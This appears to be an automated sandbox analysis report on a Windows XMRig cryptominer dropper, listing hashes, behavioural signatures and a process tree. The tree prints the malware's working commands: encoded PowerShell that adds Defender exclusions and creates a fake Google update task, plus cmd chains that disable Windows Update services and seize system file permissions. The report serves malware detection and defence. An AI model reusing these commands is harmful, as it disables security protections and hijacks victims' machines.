Analysis
-
max time kernel
300s -
max time network
288s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
14-07-2022 22:20
General
-
Target
d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe
-
Size
7.5MB
-
MD5
dd9d0dfb0b3d274e3a418084142afcc6
-
SHA1
ffacc4206b3b84a6d2c105390cf1815e022e02a5
-
SHA256
d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f
-
SHA512
d21d35069ddedc02680f8a93f37f4ddb586b0f528bebbe13f1f917de1f9c9e87c79ba29169cd30a65f227c00db52de941d64b43b0727b9809f7f4885a58aa516
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
-
XMRig Miner payload 3 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 2 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Themida packer 8 IoCs
Detects Themida, an advanced Windows software protection system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 3 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe"C:\Users\Admin\AppData\Local\Temp\d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Temp\setup.exe"C:\Windows\Temp\setup.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"3⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdwB4AGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBvAGgAdwAjAD4A"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AZwBvACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAJwAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACIAUABBAEEAagBBAEcAbwBBAGEAZwBCAHIAQQBDAE0AQQBQAGcAQQBnAEEARgBNAEEAZABBAEIAaABBAEgASQBBAGQAQQBBAHQAQQBGAEEAQQBjAGcAQgB2AEEARwBNAEEAWgBRAEIAegBBAEgATQBBAEkAQQBBAHQAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEAVQBBAEIAaABBAEgAUQBBAGEAQQBBAGcAQQBDAGMAQQBRAHcAQQA2AEEARgB3AEEAVQBBAEIAeQBBAEcAOABBAFoAdwBCAHkAQQBHAEUAQQBiAFEAQQBnAEEARQBZAEEAYQBRAEIAcwBBAEcAVQBBAGMAdwBCAGMAQQBFAGMAQQBiAHcAQgB2AEEARwBjAEEAYgBBAEIAbABBAEYAdwBBAFEAdwBCAG8AQQBIAEkAQQBiAHcAQgB0AEEARwBVAEEAWABBAEIAMQBBAEgAQQBBAFoAQQBCAGgAQQBIAFEAQQBaAFEAQgB5AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDADAAQQBWAGcAQgBsAEEASABJAEEAWQBnAEEAZwBBAEYASQBBAGQAUQBCAHUAQQBFAEUAQQBjAHcAQQBnAEEARAB3AEEASQB3AEIAMQBBAEcARQBBAGMAUQBBAGoAQQBEADQAQQAiACcAKQAgADwAIwB0AHIAaAAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAHQAbAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHUAdABrAGUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwB6AGIAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABzAGUAdAB1AHAALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBhAGMAdgAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAagBvAHgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="4⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\lol.bat" "2⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\run.bat" "2⤵
- Drops startup file
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGoAagBrACMAPgAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgADwAIwB1AGEAcQAjAD4A"1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdwB4AGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBvAGgAdwAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "nniaxtfqr"4⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe yaczcwmfonlx1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8bcGQHQgT6vgy/6HYtv8SPnEokOLbkto/HrPVPk3hf3Z4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.3MB
MD5baeb20fb698c26b6f053215674129767
SHA15eb9614a66b13b71841c8fbe7e770b17ceb3c964
SHA25699e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0
SHA512a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.3MB
MD5baeb20fb698c26b6f053215674129767
SHA15eb9614a66b13b71841c8fbe7e770b17ceb3c964
SHA25699e60e60a88630a8b730e0ca877bb62fde487d308729e627310a6168830d45e0
SHA512a25d0b578ae2c7095389e885434110116314ef4b20aed91df39de9167bc39775737be5fd73709c4f6f3c8f83800e109cf25389c4e2be37deb97f048de324965c
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5095715ac3a5a96ca0f49a9383bb1c8ff
SHA1f0aabac7407712d0846c2a346eb283ef855829cb
SHA256c6ee1c370711e6ad950f64643656a875f24e5af82344a82683182f2503cf7dba
SHA51255b2f35ec186546b2260003a8bff125da46d554a0b7056b557063fe45ccf57bb884e7209d86be88526dae8e025e4cbb5322f6ebf54e4e45d107d2f1afdd2c4f8
-
C:\Windows\Temp\lol.batFilesize
59B
MD5f580e0e80cc87b25e38ea2c0c8059d04
SHA1299f51dca9c609d6da86f93c424e39c1e6ba0d94
SHA2569e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734
SHA5125a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d
-
C:\Windows\Temp\run.batFilesize
98B
MD5731afe244b2414169a5f630d52646e56
SHA1e3771ccdccd8c306ee5fc4f264cfc3310690458c
SHA2566c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552
SHA51284e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1
-
